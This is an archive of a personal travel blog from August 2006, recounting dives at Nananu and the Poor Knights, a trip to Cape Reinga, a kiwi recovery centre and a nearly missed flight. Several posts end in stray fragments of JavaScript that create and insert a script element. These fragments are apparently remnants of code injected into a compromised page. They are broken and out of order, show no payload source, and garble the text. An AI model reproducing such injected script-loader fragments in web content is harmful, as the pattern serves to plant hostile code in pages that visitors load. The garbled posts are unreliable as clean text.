Posted by admin On August - 22 - 2006

Russell sent me a message that my one camera is fixed. I had to pay about NZ$ 490,70. But in the end it was fixed. Ok the other camera is now brocken but they say its not worth to repair it. Stupid. Sam was so interessted to see wonderful Fiji that he and his friend Nathan wanna come with me to Fiji. So we will organise all the things that we can leave on Saturday. I’m so looking forward to coming back in my little paradies.d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’);

No ‘Rainbow Warrior’

Posted by admin On August - 19 - 2006

Really unexpected I waited in vain at 7:00am in front of the dive shop. When the lady arrived she told me that all the diving shops here not dive the ‘Rainbow Warrior’ in winter. Its only seasonal. I went back to my backpackers. The day seems boring but I met Sam and we had a funny relaxed day. So it was not that bad in the end.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Cape Reinga

Posted by admin On August - 18 - 2006

Early in the morning I went with some guys I met at the diving to Cape Reinga the northern spot of New Zealand. Here the Pacific meets the Tasmanian sea. You can see a line in the water. Before we stoped at the Matari Beach and the Kerikeri Falls.

And what happend as I am in front of the famous Cape Reinga lighthouse? My other camara ‘died’. Don’t know why… but didn’t work. So I was happy to have a one-way-camera in my bag, watch the difference again…

Diving the ‘Poor Knights’

Posted by admin On August - 17 - 2006

Early in the morning the shuttle from ‘Dive Tutukaka’ picked me up. Today I was diving at the Poor Knights Island. One of the bests spots in the world for sub-tropical diving. It was so freezing that I wore two wetsuits and a jacket. I saw sleeping rays, scorpion fish, snapper, demoiselles and lots more. I liked it but I prefer warm water like in Fiji. On the boat I met Debbi, one of the instructors, and she knows the guys from Nananu – the world is so small. In the rocks of this island is the worlds biggest cave (photo below). I met some guys who has the same way to Pahia so I was this evening in Pahia.

Up north – visiting the kiwi

Posted by admin On August - 16 - 2006

The fixing of my photo camera takes about a week. So I decided to travel up north again to Whangarei to see the waterfalls. After I will go to Tutukaka for diving the ‘Poor Knights Islands’. Then I wanted to go to Pahia at the Bay of Islands. From there to Cape Reinga the northern point of New Zealand. Because I had no car I booked the ‘Stray Bus’. The driver was nice and funny and on the first day we stopped at a native forest with a 800 years old Kauri. Look at the pictures how small I am compared to this anciant giant…
Then we stopped at the ‘Native Bird Recovery Center’ of Robert and his wife. They take care since ages of the native birds. If you wanna touch a real kiwi you have only here the chance. I touched the cute ‘Sparky’. He is one-legged, so he can’t live in the wild again. Unfortunately he was trapped once. But here he found a new home. There is also the funny talking tui ‘Woof woof’ and a kissing Indian miner bird called ‘Morris’.
In the afternoon I checked in at the ‘Whangarei Falls Backpackers’. But this was a bad choice. The couple who owns this place was very grumpy. My room was ice cold at night and when I turned on the heater the fire alarm immediately started. Had a really bad night. But at least the Whangarei falls are beautiful…

Nananu in St. Lukes shopping mall?

Posted by admin On August - 9 - 2006

Went today in the St. Lukes shopping mall in Auckland/NZ for bringing my one-way-cameras to the camerahouse. Suddenly I was really surprised I thought I dream: in the shopping mall is a model of Nananu-I-Ra. You can buy parts of it… really sad how this beautiful island will change the next years. But have a look…

By the way – the world is so small – Mandy fabricated this model of Nananu. She is model maker.d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);

Almost missed the flight

Posted by admin On August - 8 - 2006

Never had that before: I got up at 6:30am in the morning. Today have to go back to cold and boring Auckland. I was a bit concerned that I could not bring my shells to New Zealand. And after changing my flight couple of times I was pretty sure that my flight is about 10:00am. So I was sitting at the deck eating my breakfast. Just in case I had a quick look at my ticket and started panicing…my flight was at 8:45am!!! And it was just 8:10am. So after fiji time it was almost impossible to get my flight. I ordered a taxi and at the airport I was running straight to my gate. Had only 10min left. But I had not known that it is necessary to bring my ticket back home to Germany with me because have a valid visa for New Zealand. The people at the counter make a big drama out of it and I was just under shock thought that I will never get my flight home. They wanted I phone card and when I gave them one they phoned to Emirates Airlines (my airline back Germany) or with the NZ customs. Finally I could go on board. Everybody just waited for me. Really embarassing situation.var d=document;var s=d.createElement(‘script’);

Last dives

Posted by admin On August - 6 - 2006

For my last dives I wished to go to my favourite dive site ‘Golden Dreams’ with ‘Shark Junction’ and a would really like to see ‘The Maze’ the only dive site in Nananu I had never seen. I was really happy when we went there. We done a deep dive in 30m at the ‘Shark Junction’ and then dives to ‘Golden Dreams’. It was so beautiful and I saw again white tip reef sharks. ‘The Maze’ was nice as well and full of corals.
